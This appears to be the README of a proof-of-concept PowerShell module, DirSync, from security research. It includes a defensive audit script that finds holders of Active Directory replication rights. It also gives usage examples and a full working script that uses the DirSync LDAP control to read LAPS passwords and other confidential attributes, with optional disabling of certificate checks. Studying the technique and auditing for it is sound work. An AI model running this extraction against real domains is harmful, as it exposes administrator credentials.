DirSync is a simple proof of concept PowerShell module to demonstrate the impact of delegating DS-Replication-Get-Changes and DS-Replication-Get-Changes-In-Filtered-Set.

DS-Replication-Get-Changes allows reading the value of confidential attributes. DS-Replication-Get-Changes-In-Filtered-Set, coupled with DS-Replication-Get-Changes, allows reading the value of confidential and Read-Only Domain Controller (RODC) filtered attributes, such as the Local Administrator Password Solution's (LAPS) ms-Mcs-AdmPwd. Neither right is sufficient for a DCSync attack, which additionally requires DS-Replication-Get-Changes-All, so their delegation is sometimes treated as low-risk; this module shows that it is not.
See technical details at https://simondotsh.com/infosec/2022/07/11/dirsync.html.
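Before running the module, it is worth knowing who already holds these two rights. The following is an added audit example, not part of the DirSync module: it walks the ACL of the domain naming context with the ActiveDirectory RSAT module and reports every principal granted either right. The domain DC=contoso,DC=com is a hypothetical placeholder; the GUIDs are the rightsGuid values of the corresponding controlAccessRight schema objects.

```powershell
# Added example (not part of the DirSync module): find the principals holding
# DS-Replication-Get-Changes and/or DS-Replication-Get-Changes-In-Filtered-Set
# on a domain naming context. Assumes the ActiveDirectory module; the domain
# DN below is hypothetical.
Import-Module ActiveDirectory

# rightsGuid of the two controlAccessRight objects in the AD schema.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    param([Parameter(Mandatory)][string] $DomainDN)

    $extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl = Get-Acl -Path "AD:\$DomainDN"

    foreach ($ace in $acl.Access) {
        # Only Allow ACEs carrying the ExtendedRight bit can grant a control access right.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.ActiveDirectoryRights -band $extendedRight) -eq 0) { continue }

        $guid = $ace.ObjectType.ToString()
        if ($ace.ObjectType -eq [guid]::Empty) {
            # An empty ObjectType means "all extended rights"; this is how
            # GenericAll holders such as Domain Admins show up.
            $granted = $ReplicationRights.Values
        } elseif ($ReplicationRights.ContainsKey($guid)) {
            $granted = @($ReplicationRights[$guid])
        } else {
            continue
        }

        foreach ($right in $granted) {
            [pscustomobject]@{
                Identity  = $ace.IdentityReference.Value
                Right     = $right
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Principals holding BOTH rights can read every RODC filtered attribute,
# LAPS passwords included. Anything beyond the built-in administrative
# and domain controller groups is a delegation worth reviewing.
Get-ReplicationRightHolders -DomainDN 'DC=contoso,DC=com' |
    Group-Object Identity |
    Where-Object { ($_.Group.Right | Sort-Object -Unique).Count -eq 2 } |
    Select-Object -ExpandProperty Name
```

Run it from a host with the AD PowerShell drive available (any account can read the domain head's security descriptor by default). Identities returned by the final pipeline are exactly the accounts against which Sync-LAPS below would succeed.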
Import the module from the repository directory:

Import-Module .\DirSync.psm1
Sync-LAPS uses the DirSync LDAP control to synchronize Legacy Microsoft LAPS' attribute ms-Mcs-AdmPwd and Windows LAPS' msLAPS-Password. Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-In-Filtered-Set.

Synchronize the LAPS password of all computer accounts with the default server and credentials:

Sync-LAPS

Bind to a specific domain controller with explicit credentials:

Sync-LAPS -Server dc.contoso.com -Username Administrator -Password Password1$ -Domain contoso.com

Restrict the synchronization to a single computer account with an LDAP filter:

Sync-LAPS -LDAPFilter '(samaccountname=workstation01$)'
Synchronize the LAPS password of all computer accounts over LDAPS, and ignore certificate validation.
Sync-LAPS -UseLDAPS -IgnoreCert
Sync-Attributes uses the DirSync LDAP control to synchronize any requested attribute(s), namely confidential and RODC filtered ones. Requires DS-Replication-Get-Changes and/or DS-Replication-Get-Changes-In-Filtered-Set depending on the attribute: DS-Replication-Get-Changes alone for confidential attributes, both rights for RODC filtered attributes.

The usage is identical to Sync-LAPS, except that -LDAPFilter and -Attributes are mandatory.

Synchronize the unixUserPassword attribute of a single user:

Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword

Request several attributes at once (comma-separated):

Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword,description
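To make the mechanism behind Sync-LAPS and Sync-Attributes concrete, the following is an added example written for this page, not the module's own code: it issues a search carrying the DirSync control (LDAP_SERVER_DIRSYNC_OID, 1.2.840.113556.1.4.841) through System.DirectoryServices.Protocols, with the same -UseLDAPS and -IgnoreCert behaviour described above. The server dc.contoso.com, the domain DC=contoso,DC=com and the account used are hypothetical; the account is assumed to hold the two replication rights.

```powershell
# Added example (not part of the DirSync module): read confidential and RODC
# filtered attributes via the DirSync LDAP control. Host names, DNs and
# credentials are hypothetical.
Add-Type -AssemblyName System.DirectoryServices.Protocols

function Invoke-DirSyncSearch {
    param(
        [Parameter(Mandatory)][string]   $Server,
        [Parameter(Mandatory)][string]   $BaseDN,      # must be a naming context head
        [Parameter(Mandatory)][string]   $LDAPFilter,
        [Parameter(Mandatory)][string[]] $Attributes,
        [pscredential] $Credential,
        [switch] $UseLDAPS,
        [switch] $IgnoreCert
    )
    $P = 'System.DirectoryServices.Protocols'
    $port = if ($UseLDAPS) { 636 } else { 389 }
    $id   = New-Object "$P.LdapDirectoryIdentifier" -ArgumentList $Server, $port
    $conn = New-Object "$P.LdapConnection" -ArgumentList $id
    $conn.AuthType = [System.DirectoryServices.Protocols.AuthType]::Negotiate
    $conn.SessionOptions.ProtocolVersion = 3
    if ($Credential) { $conn.Credential = $Credential.GetNetworkCredential() }
    if ($UseLDAPS) {
        $conn.SessionOptions.SecureSocketLayer = $true
        if ($IgnoreCert) {
            # Accept any server certificate (equivalent of -IgnoreCert).
            $conn.SessionOptions.VerifyServerCertificate = { param($c, $cert) $true }
        }
    }
    $conn.Bind()

    # Option None deliberately omits ObjectSecurity. Without that flag the DC
    # authorizes the search with the caller's replication rights instead of the
    # per-attribute read ACLs, which is what exposes confidential and filtered
    # attributes. A caller lacking the rights gets InsufficientAccessRights.
    $control = New-Object "$P.DirSyncRequestControl"
    $control.Option = [System.DirectoryServices.Protocols.DirectorySynchronizationOptions]::None

    $results = @()
    do {
        $req = New-Object "$P.SearchRequest" -ArgumentList $BaseDN, $LDAPFilter,
            ([System.DirectoryServices.Protocols.SearchScope]::Subtree), $Attributes
        [void]$req.Controls.Add($control)
        $resp = [System.DirectoryServices.Protocols.SearchResponse]$conn.SendRequest($req)

        foreach ($entry in $resp.Entries) {
            $row = [ordered]@{ DistinguishedName = $entry.DistinguishedName }
            foreach ($a in $Attributes) {
                # Objects without the attribute (e.g. a computer never managed
                # by LAPS) are still returned; report them as $null.
                $row[$a] = if ($entry.Attributes.Contains($a)) {
                    @($entry.Attributes[$a].GetValues([string])) -join ';'
                } else { $null }
            }
            $results += [pscustomobject]$row
        }

        # The response control carries a cookie; feed it back until MoreData is false.
        $dsResp = $resp.Controls |
            Where-Object { $_ -is [System.DirectoryServices.Protocols.DirSyncResponseControl] }
        $control.Cookie = $dsResp.Cookie
    } while ($dsResp.MoreData)

    $conn.Dispose()
    return $results
}

# Equivalent of: Sync-LAPS -LDAPFilter '(samaccountname=workstation01$)' -UseLDAPS -IgnoreCert
$cred = Get-Credential 'CONTOSO\Administrator'
Invoke-DirSyncSearch -Server dc.contoso.com -BaseDN 'DC=contoso,DC=com' `
    -LDAPFilter '(&(objectClass=computer)(samaccountname=workstation01$))' `
    -Attributes 'ms-Mcs-AdmPwd', 'msLAPS-Password' -Credential $cred -UseLDAPS -IgnoreCert
```

Two caveats when reproducing this: the DirSync control is only accepted on a naming context head with subtree scope, so -BaseDN must be the domain (or another NC) root rather than an OU, and the same call run with ObjectSecurity set in $control.Option returns no confidential or filtered values, because the server then falls back to ordinary attribute ACLs. Comparing the two runs is the quickest way to confirm that the replication rights, not a read ACL, are what exposes the data.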
Thank you to @marcan2020 for his usual code reviews.
See the LICENSE file for legal wording. Essentially it is MIT, meaning that I cannot be held responsible for whatever results from using this code, and do not offer any warranty. By agreeing to this, you are free to use and do anything you like with the code.